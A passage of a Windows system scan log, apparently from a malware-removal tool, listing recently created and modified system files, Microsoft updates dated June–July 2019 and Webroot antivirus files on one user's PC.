2019-07-09 19:06 - 2019-06-12 10:19 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000373248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000195072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:15 - 000631680 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2019-07-09 19:06 - 2019-06-12 10:11 - 000708328 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2019-07-09 19:06 - 2019-06-12 10:11 - 000262376 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2019-07-09 19:06 - 2019-06-12 10:11 - 000153832 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2019-07-09 19:06 - 2019-06-12 10:11 - 000094440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2019-07-09 19:06 - 2019-06-12 10:10 - 005550824 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2019-07-09 19:06 - 2019-06-12 10:10 - 000095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2019-07-09 19:06 - 2019-06-12 10:09 - 001664352 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 014637568 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 012574720 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2019-07-09 19:06 - 2019-06-12 10:08 - 000782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000361984 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000236032 _____ (Microsoft Corporation) C:\Windows\system32\srvsvc.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000094208 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\sscore.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2019-07-09 19:06 - 2019-06-12 10:08 - 000005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 004120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 001574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 001484800 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 001472512 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 001211392 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 001202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 001162752 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 001068544 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000733184 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000499712 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000433152 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000408576 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000317440 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000187904 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000081920 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\mssign32.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000037376 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000011264 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000680960 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000438784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000295936 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2019-07-09 19:06 - 2019-06-12 10:06 - 000004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:05 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2019-07-09 19:06 - 2019-06-12 10:04 - 000023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2019-07-09 19:06 - 2019-06-12 10:01 - 000663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2019-07-09 19:06 - 2019-06-12 09:55 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sscore.dll
2019-07-09 19:06 - 2019-06-12 09:54 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2019-07-09 19:06 - 2019-06-12 09:50 - 000055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2019-07-09 19:06 - 2019-06-12 09:49 - 000205312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Dism.exe
2019-07-09 19:06 - 2019-06-12 09:49 - 000125952 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2019-07-09 19:06 - 2019-06-12 09:49 - 000024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2019-07-09 19:06 - 2019-06-12 09:48 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2019-07-09 19:06 - 2019-06-12 09:48 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2019-07-09 19:06 - 2019-06-12 09:48 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2019-07-09 19:06 - 2019-06-12 09:48 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2019-07-09 19:06 - 2019-06-12 09:47 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2019-07-09 19:06 - 2019-06-12 09:46 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 09:46 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 09:46 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 09:46 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 09:42 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2019-07-09 19:06 - 2019-06-12 09:42 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2019-07-09 19:06 - 2019-06-12 09:42 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2019-07-09 19:06 - 2019-06-12 09:42 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2019-07-09 19:06 - 2019-06-12 09:39 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2019-07-09 19:06 - 2019-06-12 09:39 - 000129024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\videoprt.sys
2019-07-09 19:06 - 2019-06-12 09:38 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2019-07-09 19:06 - 2019-06-12 09:37 - 000274944 _____ (Microsoft Corporation) C:\Windows\system32\Dism.exe
2019-07-09 19:06 - 2019-06-12 09:37 - 000011264 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe
2019-07-09 19:06 - 2019-06-12 09:37 - 000009728 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2019-07-09 19:06 - 2019-06-12 09:36 - 000464384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2019-07-09 19:06 - 2019-06-12 09:36 - 000406016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2019-07-09 19:06 - 2019-06-12 09:36 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2019-07-09 19:06 - 2019-06-12 09:36 - 000169472 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2019-07-09 19:06 - 2019-06-12 09:36 - 000160768 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2019-07-09 19:06 - 2019-06-12 09:36 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2019-07-09 19:06 - 2019-06-12 09:35 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2019-07-09 19:06 - 2019-06-12 09:35 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdk8.sys
2019-07-09 19:06 - 2019-06-12 09:35 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelppm.sys
2019-07-09 19:06 - 2019-06-12 09:35 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\processr.sys
2019-07-09 19:06 - 2019-06-12 09:35 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdppm.sys
2019-07-09 19:06 - 2019-06-12 09:35 - 000044544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\npfs.sys
2019-07-09 19:06 - 2019-06-12 09:35 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2019-07-09 19:06 - 2019-06-10 21:59 - 002863104 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2019-07-09 19:06 - 2019-06-10 21:59 - 001712640 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2019-07-09 19:06 - 2019-06-10 21:59 - 000801792 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2019-07-09 19:06 - 2019-06-10 21:59 - 000634368 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2019-07-09 19:06 - 2019-06-10 21:59 - 000501760 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2019-07-09 19:06 - 2019-06-10 21:59 - 000456192 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2019-07-09 19:06 - 2019-06-10 21:59 - 000315904 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2019-07-09 19:06 - 2019-06-10 21:59 - 000257024 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2019-07-09 19:06 - 2019-06-09 10:20 - 003229184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2019-07-09 19:06 - 2019-06-09 10:19 - 000131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2019-07-09 19:06 - 2019-06-09 10:08 - 003730432 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2019-07-09 19:06 - 2019-06-09 10:08 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2019-07-09 19:06 - 2019-06-09 10:07 - 000158720 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2019-07-09 19:06 - 2019-06-09 10:04 - 001053184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2019-07-09 19:06 - 2019-06-09 10:04 - 000036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2019-07-09 19:06 - 2019-06-09 09:49 - 001120768 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2019-07-09 19:06 - 2019-06-09 09:49 - 000249344 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2019-07-09 19:06 - 2019-06-07 10:18 - 001425920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2019-07-09 19:06 - 2019-06-07 10:18 - 000026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleres.dll
2019-07-09 19:06 - 2019-06-07 10:08 - 002072576 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2019-07-09 19:06 - 2019-06-07 10:08 - 000516096 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2019-07-09 19:06 - 2019-06-07 10:08 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\oleres.dll
2019-07-09 19:06 - 2019-06-07 10:07 - 000008704 _____ (Microsoft Corporation) C:\Windows\system32\comcat.dll
2019-07-09 19:06 - 2019-06-07 09:55 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comcat.dll
 
==================== One month (modified) ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-07-17 08:46 - 2009-07-13 23:45 - 000028944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-07-17 08:46 - 2009-07-13 23:45 - 000028944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-07-17 08:41 - 2013-03-13 19:42 - 000108816 _____ C:\Users\richard\AppData\Local\GDIPFONTCACHEV1.DAT
2019-07-17 08:34 - 2014-09-20 23:21 - 000000000 ____D C:\Windows\Minidump
2019-07-17 08:34 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\inf
2019-07-17 08:31 - 2016-11-16 22:48 - 000000000 ____D C:\Users\richard\AppData\LocalLow\Mozilla
2019-07-17 08:25 - 2013-12-21 18:46 - 000002224 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-07-17 08:25 - 2013-12-21 18:46 - 000002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-07-17 08:14 - 2013-03-13 21:45 - 000000000 ____D C:\ProgramData\WRData
2019-07-17 08:11 - 2013-03-13 21:45 - 000181536 _____ (Webroot) C:\Windows\SysWOW64\WRusr.dll
2019-07-17 08:11 - 2013-03-13 21:45 - 000112480 _____ (Webroot) C:\Windows\system32\WRusr.dll
2019-07-17 08:11 - 2013-03-13 21:45 - 000000747 _____ C:\Users\Public\Desktop\Webroot SecureAnywhere.lnk
2019-07-17 08:11 - 2013-03-13 21:45 - 000000000 ____D C:\Program Files\Webroot
2019-07-17 08:05 - 2009-07-14 00:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
